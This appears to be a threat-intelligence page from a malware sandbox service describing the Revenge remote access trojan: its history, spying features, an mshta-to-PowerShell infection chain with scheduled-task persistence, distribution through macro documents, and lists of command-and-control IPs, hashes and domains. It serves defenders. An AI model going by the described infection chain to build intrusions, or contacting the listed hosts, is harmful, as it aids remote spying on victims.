Revenge

Revenge was one of the most popular remote access trojans to be used in 2019 when it was featured in a huge malicious campaign named “Aggah”. This malware can take remote control of infected machines and spy after the victims.

Type
Trojan
Origin
Unknown
First seen
1 January, 2016
Last seen
28 September, 2020
Global rank
32
Week rank
17
Month rank
24
IOCs
1919

What is Revenge Malware?

Revenge belongs to the class of Remote Access Trojans which means that it is usually used by the attackers to control infected PCs remotely or spy on the users by monitoring keystrokes and even computer surroundings through the remote webcam and microphone access.

Discovered for the first time in 2016, Revenge RAT continues to be a threat at the present day with a big spike in popularity monitored in 2019, when the malware was observed targeting corporations and government structures all around the world in a massive malicious campaign codenamed “Aggah”. Thanks to a large variety of distribution methods, robust core feature-set, and solid persistence mechanisms, Revenge has become a popular choice for cybercriminals. The popularity of this RAT was further aided by its open-source nature – anybody can freely download Revenge on underground hacking forums and employ it in their own campaigns.

General description of Revenge

The Revenge RAT was first observed in the wild in June 2016, when it was released by a user with a nick Napoleon – an Arabic speaking member of the underground hacking community.

The initial version of this malware was a simple malicious program that didn’t offer much, if any, code obfuscation and was mainly used by other Arabic speaking cybercriminals. Despite the simplicity of the malware, at the time, only one out of 54 of VirusTotal scanners could pick up the malicious nature of the Revenge code, which confused the researchers bearing in mind the lack of anti-analysis techniques.

The creator used Visual Basic to develop this RAT and personally admitted that the malware was very bare-bones at the time of its initial release– providing only the most basic functions and definitely losing to competitors in terms of core feature-set. According to Napoleon, this explained why Revenge was available free of charge.

After two months since the initial release, a new version v0.2 was issued by the author, on a more popular hacking forum, this time with more features, but still offered completely free of charge. Since then Revenge has evolved even further and today, it offers cybercriminals a wide range of capabilities including remote files and registry alterations on an infected machine, access to memory, processes and services as well as access to connected devices such as keyboards, webcams and mice, allowing this malware to record the actions of its victims and collect information like banking credentials and social account data.

Core malicious feature-set was not the only thing that evolved over the course of the Revenge lifetime. Improvements in distribution and persistence made this threat truly a force to be reckoned with. In some campaigns, scripts were executed in the HTML of a custom blogspot [com] page.

Revenge malware analysis

A video recorded in the ANY.RUN malware hunting service allows us to take a look at the execution of this malware as it unfolds.

process graph of the revenge trojan execution Figure 1: Displays the lifecycle of Revenge in a visual form. A graph generated by ANY.RUN

text report of the revenge analysis Figure 2: Shows a customizable text report generated by the ANY.RUN malware analysis service which allows diving deeper into the details of the Revenge execution process.

Revenge execution process

Sometimes the first steps of Revenge trojan execution may vary depending on how it made its way into a victim's computer. The most common form of initial infiltration vector is by the use of Mshta.exe for downloading the payload or for direct execution from a URL. After the payload is delivered to the infected machine, Mshta.exe changes the autorun value in the registry and starts three processes - cmd.exe, powershell.exe and schtasks.exe. It starts cmd.exe to kill processes from a list, in the given example processes from Microsoft Office packet were targeted. Powershell.exe is being launched to download the main payload. In turn, schtasks.exe is launched in a way to generate a scheduled task which provides Revenge persistence in the infected system. After all these steps, the malware is ready to complete commands from C2 servers.

How to avoid infection by Revenge?

The best line of defense against threats like Revenge RAT is to keep a security product installed and updated with the latest firmware. One should not disable native Windows security features, regularly update the OS and adhere to the best security practices of staying safe online.

As such, it is advised to stay clear of downloading email attachments from unknown senders and never enabling macros in Microsoft Office if prompted to do so by a file downloaded from a suspicious email.

Distribution of Revenge

Revenge has been seen being distributed in a variety of ways, some of which are potentially more effective than others. For example, Revenge is known to infect PCs from malicious email attachments and corrupted ads on compromised websites.

Most commonly, once delivered in the Microsoft Office file that was downloaded and launched by the potential victim, Revenge will use macros to connect to an outside domain, sometimes hidden on a web page, from which additional scripts and content are downloaded until the actual malware is installed on the PC.

How to detect Revenge RAT using ANY.RUN?

Analysts can get information about which MITRE ATT&CK™ MATRIX techniques were applied by malware. Just click on the "ATT&CK™ MATRIX " button.

Revenge MITRE ATT&CK MATRIX techniques Figure 3: Revenge MITRE ATT&CK MATRIX techniques

Conclusion

Revenge is no slouch when it comes to Remote Banking Trojans. It has begun it’s lifespan as a simplistic malware with functionality and without anti-analysis features but has evolved to become a capable and persistent trojan used in massive attacks in Europe, North America, Asia, and the Middle East.

The popularity of this malware is not only due to its robust feature-set, but also ready availability since Revenge can be downloaded for free from a number of underground communities.

Professionals can establish a secure cyber defense against Revenge and similar RATs and secure their corporate or government networks by reverse engineering and studying a threat using malware hunting services like to ANY.RUN.

IOCs

IP addresses
3.134.125.175
193.161.193.99
192.169.69.25
3.130.209.29
79.134.225.73
3.13.191.225
45.157.214.248
3.131.123.134
79.134.225.88
199.19.224.65
79.134.225.105
189.84.162.211
79.134.225.72
3.125.223.134
3.124.142.205
197.2.100.116
191.205.215.182
79.134.225.82
193.56.28.101
179.126.74.196
Hashes
862c9d7b0420f73fa282a6f84f120ef88e6caa02fd983cda623bfb69854c20f7
5c0ec56a68c46272465f6e63d9291095e097f0c4ec0ab029f055a4a10d396cc5
78e42d74899e82219d14181ee6ce6b7a72a426dee20990a73c3599a59e22f90d
7fc30a866b6ce3adead00c44d86d64f6d8d0415834d3fc9145fc1dd104174243
6226d135ddfad149e446daacb6150bbb273497309ee8809679b6ae8230dc7b8e
3f7224ce74a67b29b2d6559fc13263545e417e040d21749fa02a76d2ad05e508
aee4cbba6624d183b3d6dde9ea56914d891ea585cf556433dc5a9f31bb5b9a7d
bd51f2ab71483b1538d9a29eb36cf1928314b8987cc5eb439f77fdccce0da422
cafb9d016b5e787e518dfdbe1c8c51f8677c4ef38fceef7ed0bb61195fd3d7e9
01233689c67aa8c608ef67e84260ceaf9d5aa3847098612277a5836f1535411f
2183a71f544a5968db789d4f2dd872c8c34cbfd12870db43903ce8759bcb9d7c
b10032241b88c70a52cd141b4c6ad559cd1da780e79ef32a1e059a8e1acc6332
37dbf3b26ddc049072ec24e6bc972ff5b840cefb0066632e9747e141006f3d26
0c6454f0457b3cb8cf68cac1203ba507b526f036e67543ad6e7d186c2d05e1ca
cf74c21533aff071f0222685dd6d1146e15f1174d24f492eebdaa961cbbc2853
25c2e53fa97296ce274d973b573c92650db3aa188efdf473ed5a3c54c8ea9872
ca7178f8be784492284c2a2c60560ab325470f4ed52b1d232fd53c0a2355092e
53afd7e9d6f7b899c9349a8d8cd2e05f35c58edb3d775752b5ebaac96a80edf7
92ca9e2d1efcbf4cabd517930e4e0c9b6b329ca2e18a8e5c81f196296a72f093
bbcf4a37eb9e6a37e332157c3910bd985c01a75f4b9dd91369db67e2ea44c13e
Domains
majul.com
isns.net
helpout.duckdns.org
kenzeey.duckdns.org
intrament.duckdns.org
amachichystdyjakelogontothecomputer15bvn.duckdns.org
20greenkegheedahatakankeadeshnaastdyhma.duckdns.org
stdychinese2onlyywalkaloneinlifev14fas.duckdns.org
https.webemail.office.tr0uakvdlhfpux0h14z3glqe8uhjd.k67ohsh74r947lhd1mkh6.77h6bvhxdy9khha143q.601at76hd7p8jzjyps8xnsk0m.utzs74k51hiknye31.6fqf25lg71d7qujv1lm6s0jl64k70.leb7ycqkqa2hc7lolftj1tkrho.bdvehe.duckdns.org
webemail.office.tr0uakvdlhfpux0h14z3glqe8uhjd.k67ohsh74r947lhd1mkh6.77h6bvhxdy9khha143q.601at76hd7p8jzjyps8xnsk0m.utzs74k51hiknye31.6fqf25lg71d7qujv1lm6s0jl64k70.leb7ycqkqa2hc7lolftj1tkrho.bdvehe.duckdns.org
tasklistmgr.duckdns.org
javiersalazar87.duckdns.org
27dejulio.duckdns.org
mail123.duckdns.org
javiertrabajovalle.duckdns.org
wsdykung37communicationtarisupliermgcxa.duckdns.org
orlandoblunblun2020.duckdns.org
myfrontmanny.duckdns.org
switchtocloudsystemwithservergoogleapi.duckdns.org
u7546u53y4wrewegrdfgwe.duckdns.org

HAVE A LOOK AT

Adwind screenshot
Adwind
adwind trojan
Adwind RAT, sometimes also called Unrecom, Sockrat, Frutas, jRat and JSocket is a Malware As A Service Remote Access Trojan that attackers can use to collect information from infected machines. It was one of the most popular RATs in the market in 2015.
Read More
Agent Tesla screenshot
Agent Tesla
agenttesla trojan rat stealer
Agent Tesla is spyware that collects information about the actions of its victims by recording keystrokes and user interactions. It is falsely marketed as a legitimate software on the dedicated website where this malware is sold.
Read More
Ave Maria screenshot
Ave Maria
avemaria stealer trojan rat
Ave Maria malware is a Remote Access Trojan that is also called WARZONE RAT. Hackers use it to control PCs of their victims remotely and steal information from infected PCs. For example, they can remotely activate the camera to take pictures of a victim and send them to a control server
Read More
Azorult screenshot
Azorult
azorult trojan rat
AZORult can steal banking information including passwords and credit card details as well as cryptocurrency. This constantly updated information stealer malware should not be taken lightly, as it continues to be an active threat.
Read More
Crimson RAT screenshot
Crimson RAT
crimson rat trojan
Crimson is a Remote Access Trojan — a malware that is used to take remote control of infected systems and steal data. This particular RAT is known to be used by a Pakistani founded cybergang that targets Indian military objects to steal sensitive information.
Read More
Danabot screenshot
Danabot
danabot trojan stealer
Danabot is an advanced banking Trojan malware that was designed to steal financial information from victims. Out of the Trojans in the wild this is one of the most advanced thanks to the modular design and a complex delivery method.
Read More